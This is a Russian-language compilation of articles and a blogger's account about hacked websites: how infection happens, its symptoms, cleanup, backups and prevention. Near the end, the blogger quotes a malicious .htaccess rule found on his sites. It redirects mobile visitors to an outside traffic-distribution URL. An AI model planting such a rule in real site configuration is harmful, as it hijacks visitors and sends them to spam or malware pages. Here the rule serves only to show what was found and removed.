Комп заражен вирусами что делать. Что делать, если компьютер заражен? Как очистить ваш компьютер и убедиться, что он действительно чист
Не первый год являются основным направлением деятельности нашей компании. И мы с уверенностью можем констатировать что заражение сайта вирусами - настоящая пандемия.
Заражение может произойти путем внедрения вредоносных кодов через различные скрипты на сайте, через взлом доступа к админке, через кражу логина и пароля к FTP, через дыры и т.п.
Это приводит к плачевным результатам:
- заражение посетителей;
- нарушение работы сайта;
- и самое, пожалуй, страшное – сайт попадает в БлэкЛист поисковых роботов, таких как Гугл или Яндекс, что в свою очередь ведет к потере посетителей, а в случае бизнес – сайта к потере прибыли и репутации.
Заражен ли сайт можно узнать следующими путями:
- при помощи антивируса;
- можно определить заражение, проверив исходный код, например, в браузере нажав одновременно клавиши Ctrl+U;
- гляньте на индексный файл – когда вносились изменения последний раз, если в это время Вы не обновляли информацию, тогда…
- воспользуйтесь услугами Яндекс-Вебмастер или Google-Webmasters.
Ваш сайт подвергся заражению, что можно сделать?
Здесь все будет зависеть от степени заражения, от Вашего хостинг провайдера и т.д.
Первым способом решения этой проблемы будет обращения за помощью к специалистам, это особенно актуально для новичков. Так что ждем Вашего звонка!
Второй способ зависит от Вашего хостинга и аккаунта, доступен ли Вам бэкап сайта и делали ли Вы его регулярно. Если ответ положительный – смело «откатывайтесь» назад до заражения. Если бэкап делался хостингом, изложите ему свою проблему и просьбу «откатить» Ваш сайт на дату до заражения. Но здесь есть одно но – как давно сайт заражен? Если давно, очень большая вероятность что и бэкапы содержат вирус.
Если два предыдущих решения не доступны – придётся Вам заниматься этим вручную. Возможно, вирус не нанес существенного вреда и заражены всего несколько файлов, обычно это index.php и index.html. Но может быть, что заражению подверглись и другие файлы. Заблокируйте доступ на сайт, положив в корень сайта файл “.htaccess” – это для того что бы ни портить себе рейтинг в поисковиках. Далее скачивайте содержимое Вашего сайта на свой компьютер, желательно архивом и запускайте антивирус, как минимум половину работы он сделает. Чего не сделает он – придётся в ручную. Но все же это лучше, нежели заново начинать создание сайта. Постоянно следите за безопасностью Вашего ПК.
Проблема заражения может быть и в Вашем компьютере, не забывайте о достойной антивирусной программе на нем.
Если заражение есть – обязательно поменяйте все пароли от сайта, как для доступа к «админке», так и для доступа к FTP, пароль к Вашему аккаунту на хостинге и т.д. Поскольку никто Вам не скажет, какую информацию получили злоумышленники.
Помните о безопасности, как ПК, так и сайта, соблюдайте все предосторожности и рекомендации. И надеемся, что Ваш опыт не будет печальным, успехов Вам!
Не все владельцы сайтов являются профессиональными программистами. Многие пользуются движками и заказывают разработку ресурсов.
Рано или поздно приходится столкнуться с проблемами, они бывают разные. Заращение сайтов вирусом не такая редкая картина, этого стоит опасаться и периодически сканировать площадку.
Что значит – сайт заражен вирусом? Оказывается, даже профессионалы теряются, когда им задают такой вопрос.
Все знают, что компьютер заражается вредоносной программой, но как это происходит на сайтах? Здесь всё немного по-другому, хотя если заражается сервер (где сайт расположен), то разницы практически нет.
Как выглядит веб-вирус?
Если сайт заражен вирусом, значит, в его коде установлен специальный скрипт, выполняющий дополнительные операции. Чаще всего зараженные сайты сразу выдают себя, как только заходишь на них.
Для посетителей это может проявляться разными последствиями:
- выполняется подписка на платный контент;
- загружаются вредоносные программы;
- показ рекламы на сайте;
- перенаправление трафика на другие ресурсы.
Как правило, хакеры всё делают так, чтобы жертвы ничего не заметили. Вебмастерам нужно почаще заходить на собственный сайт и выполнять внутренние переходы. Также нужно реагировать на сообщения от пользователей.
Для владельца сайта заражение его проекта может приводить к другим последствиям.
В основном это:
- отказ в доступе к административной панели;
- блокировка сканирования сайта антивирусом;
- блокирока аккаунта со стороны хостинга;
- блокирование в рекламных сервисах (например, в Google Adsense);
- резкое падение посещаемости;
- дополнительные окна, левые рассылки;
- ухудшение поведенческих факторов.
Конкуренты мечтают заразить сайт вирусом своих оппонентов, но сделать это не так просто. К тому же, это подсудное дело, поэтому не каждый программист возьмется помочь со взломом.
Остерегаться нужно любых подозрительных изменений, если ничего не делаешь, то почему всё меняется? Должно быть объяснение.
Что делать, если сайт заражен вирусом?
Последствия заражения сайта вирусами могут быть различными, но позиции в поисковых системах просядут однозначно. Нужно как можно раньше определить заражение площадки, чтобы найти и удалить вредоносный код.
Перед тем как начинать поиски, вспомните, не устанавливали ли вы сами какие-нибудь подозрительные коды. К примеру, скрипт от , который выполняет платные подписки, тоже относится к вирусам, так как он обманывает честных посетителей.
Если вы заметили на сайте какие-нибудь изменения и в целях профилактики, запускайте проверку через сервис . На главной странице потребуется указать адрес сайта и уже через пару минут появится статус проверки:
Как видите, у нашего блога всё чисто. Если были бы обнаружены проблемы, сервис указал бы на проблемы. Удалить вредоносный код с сайта не тяжело, а чтобы вирус не успел сильно навредить, закажите в этом сервисе уведомления .
Если сайт заражен вирусом, что делать вы не знаете, обратитесь к профессионалам. На есть много специалистов из любой ниши, они предоставляют платные услуги.
Сайты с вредоносными кусками кода и скриптами быстро теряют позиции и их репутация снижается. Нужно следить за своими площадками и помнить, что только честные методы монетизации приносят большую прибыль, ведь в противном случае посетители никогда не вернутся на сайт.
Вам также будет интересно:
—
—
—
Иногда случается, что антивирус, сканируя ваш сайт, сигнализирует об угрозах. Это значит, что он заражен вирусом, то есть вредоносным кодом. Из-за вирусов сайт начинает медленнее загружаться, некоторые его скрипты перестают работать. Все это будет сразу же замечено посетителями и их недовольство плохой работой сайта резко возрастет.Если произошло заражение сайта, то для того, чтобы устранить вирус, владельцу сайта нужно понимать, что это такое, откуда оно взялось и как работает.
Что такое вирус и как он заражает сайт?
Вирус – это зашифрованный вредоносный код, внедряющийся в код страницы ресурса. Он часто бывает сформирован в iframe — элементе, который дает внедрить одну страницу в содержание другой. Обычно, iframe внедряет еще более зараженную страницу, код которой ищет уязвимости в браузере и использует их для того, чтобы загружать и запускать файлы вирусов на компьютере посетивших сайт пользователей.
Как правило, большинство вирусов работают по одному и тому же принципу. Оказавшись на компьютере, владелец которого входил на сайт по FTP протоколу, вирус находит реквизиты для входа на этот сайт. Найденные данные отправляются на компьютеры к хакерам. Используя эти реквизиты, хакеры, с помощью роботов, сканируют сайт и ищут корневые файлы. Когда файлы найдены, они загружаются на компьютер хакера, в них добавляется опасный код, и такой зараженный файл отправляется обратно на сайт.
Для владельца сайта такая активность практически незаметна. Он видит лишь авторизацию пользователя и работу с файлами, что обычно и происходит, когда разработчик обновляет ресурс.
Как устранить заражение
Для борьбы с заражением сайта, нужно точно следовать следующим шагам:
- Если сайт заражен, то, в первую очередь, он несет опасность для своих клиентов. Для их защиты отключите веб-сервер. После этого, с помощью антивируса, проверьте все файлы веб-сервера, а также смените абсолютно все пароли от всех рабочих станций.
- Если у вас имеется резервная копия, созданная до того, как сайт был заражен вирусом, загрузите ее. Обязательно обновите все ПО сайта и изучите уязвимости, исправленные в последних версиях. Это может помочь в поиске причины заражения файлов.
- Лишите повышенных полномочий всех пользователей, в которых вы до конца не уверены. Внимательно проверьте, нет ли на вашем сервере веб-шелла, используя который хакеры имеют возможность вносить правки в код вашего ресурса без авторизации.
Поиск опасного кода
- Просканируйте все шаблоны, скрипты, базы данных.
- Просканируйте конфигурационные файлы.
- Проверьте все файлы, размещенные на одном с вами сервере. Быть может, под угрозой находится весь сервер, и дело не только в вашем сайте.
Для более успешного поиска вредоносного кода в зараженных файлах обращайте внимание на следующие особенности:
- Вредоносный код отличается от кода в резервной версии. Регулярно сохраняйте резервные копии и используйте системы контроля версий. Это часто облегчает борьбу с заражением.
- Код не читается и не имеет четкой структуры.
- Время изменения файла и время заражения сайта вирусом совпадают. Этот параметр не всегда объективен, так как время изменения файла может быть подделано самим вирусом.
- В коде имеются функции, похожие на вирусный код.
Предотвращение заражения
Бороться с заражением сайта лучше до того, как оно произошло. Для того, чтобы избавиться от всех уязвимостей и минимизировать возможность заражения, следуйте следующим правилам:
- Позаботьтесь, чтобы FTP клиенты не имели возможности сохранять пароли.
- Регулярно меняйте пароли доступа и не храните их на компьютере.
- Уменьшите количество пользователей, которые могут со своих адресов подключаться по FTP.
- Все компьютеры пользователей, которые имеют доступ к FTP, должны быть в обязательном порядке оснащены антивирусами и последними обновлениями всех программ.
Если ваш сайт подключен к панели вебмастера и в ней также было сообщение об угрозе, после избавления от нее вам нужно, чтобы Яндекс снял с вашего сайта пометку об опасности. Для этого вы должны отправить соответствующий запрос. Перепроверка будет сделана и без запроса, но времени это займет значительно больше.
Первая помощь
Если вы обнаружили, что сайт заражен или вам пришло уведомление о наличии вредоносного ПО на вашем аккаунте:
Почему на моём сайте вирусы?
Частыми причинами заражения сайта являются:
- уязвимость в используемой версии CMS;
- уязвимость в установленном расширении CMS (темы, плагины, модули);
- вирусы на компьютере, с которого происходит управление сайтом.
Чаще всего злоумышленники взламывают сайты в автоматическом режиме при помощи специальных программ. Они собирают большую базу сайтов из поисковых систем по определённым критериям (сайты, установленные на популярных CMS и их плагины, подверженные какой-либо известной уязвимости). После этого в файлах сайтов размещается вредоносный код. Поэтому важно своевременно обновлять CMS и плагины. Со стороны хостинга ваши сайты максимально защищены. В случае заражения сайта другого клиента на сервере, ваш сайт будет находиться в безопасности.
Как я могу защитить сайт?
Чтобы оградить сайт от взлома, следует придерживаться простых правил:
- Устанавливайте корректные права на каталоги и файлы сайтов. Старайтесь не использовать права «777», поскольку эти атрибуты дают любому пользователю полный доступ к файлам и каталогам вашего аккаунта. Используйте права «777» только в исключительных случаях.
- Следите за обновлениями используемой CMS и её плагинов на официальных сайтах и своевременно устанавливайте их.
- Используйте только официальные темы и плагины CMS. Очень часто во взломанных (nulled) версиях платных скриптов имеются вирусы.
- Используйте сложные пароли (длиной не менее 8 символов, с цифрами и буквами разных регистров). Помните, что простые пароли очень легко подбираются.
- Пользуйтесь антивирусным программным обеспечением и регулярно обновляйте антивирусные базы.
- Пользуйтесь только актуальными версиями браузеров (Mozilla Firefox, Google Chrome, Opera, Safari).
- Не храните пароли в FTP-клиентах. Очень часто вирусы берут информацию из FTP-клиента.
Вчера у меня произошло не очень приятное происшествие — заразили все мои сайты. Хорошо, что я был за компьютером и сразу заметил проблему. Что произошло?
Один мой сайт стало вдруг перебрасывать на какой то сайт знакомств, неприличный сайт, мягко говоря. При переходе на мой домен тут же шёл редирект на этот спамерский сайт.
Это очень плохая ситуация, так как если сразу не решить проблему, то вы можете распугать посетителей. А если это продлится долго, то поисковые системы могут наложить на ваш сайт фильтр и вы потеряете все позиции в поиске.
Я уже писал как то о том, но в данном случае требовалось найти вирус быстро. Я тут же стал искать вредоносный код вручную.
Так как переадресация шла со всех страниц, то я подумал, что какой скрипт мне внедрили в шапку (header.php) или подвал (footer.php). Но там постороннего кода не было.
Я тут же связался со службой поддержки хостинга:
— У меня сайт такой то, стал переадресовываться на какой то неприличный ресурс, помогите решить проблему.
Но не успели они мне ответить, как я сам догадался куда ещё нужно посмотреть. В файле.htaccess, который находится в корне сайта, я обнаружил вот такой код:
RewriteEngine On RewriteBase / RewriteCond %{HTTP_USER_AGENT} android|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|pad)|iris|kindle|lge |maemo|meego.+mobile|midp|mmp|netfront|palm(os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp(i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac(|-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(|/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg(g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v)|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-|)|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-) RewriteRule ^$ _http://luxurytds.com/go.php?sid=1 # BULLETPROOF .50.8 >>>>>>> SECURE .HTACCESS
Как только я его удалил, все стало работать как нужно. На все у меня ушло 5 мин. Но если бы на моем месте был полный новичок, то у него на это могла бы уйти куча времени, если бы он вообще смог найти проблему сам.
К своему ужасу я обнаружил, что подобным образом заразили все мои сайты. Я тут же устранил проблему и написал в поддержку хостинга:
У меня все сайты заразили, значит заразили и все на вашем хостинге, не плохо было бы предупредить народ.
На что последовал ответ:
«Заразили» только файлы Ваших сайтов. Следовательно, в каком-то (каких-то) из Ваших сайтов имеются уязвимости, которую(ые) использовали для изменения файлов на аккаунте. Вам нужно обратиться к веб-разработчику для поиска и устранения этих уязвимостей.
Может и так, не проверить. Это уже не первый случай, когда мои сайты на этом хостинге пытаются заразить. Неужели у всех вебмастеров такие проблемы? Или это только на моём хостинге?
Это мой не первый хостинг и нигде у меня не было таких проблем. Все больше склоняюсь к том, чтобы сменить хостинг, к примеру на ЭТОТ.
Не успел я решить эту проблему, как техподдержка написала мне, что другой мой сайт рассылает спам. Как оказалось, мне в папку с одним плагином залили посторонний php файл, и через него как то слали спам.
Я удалил этот файл, и проблема решилась. У меня уже чётко складывается впечатление, что WordPress — это тот же Windows, и что с этим делать ?
Не нашли ответ? Воспользуйтесь поиском по сайту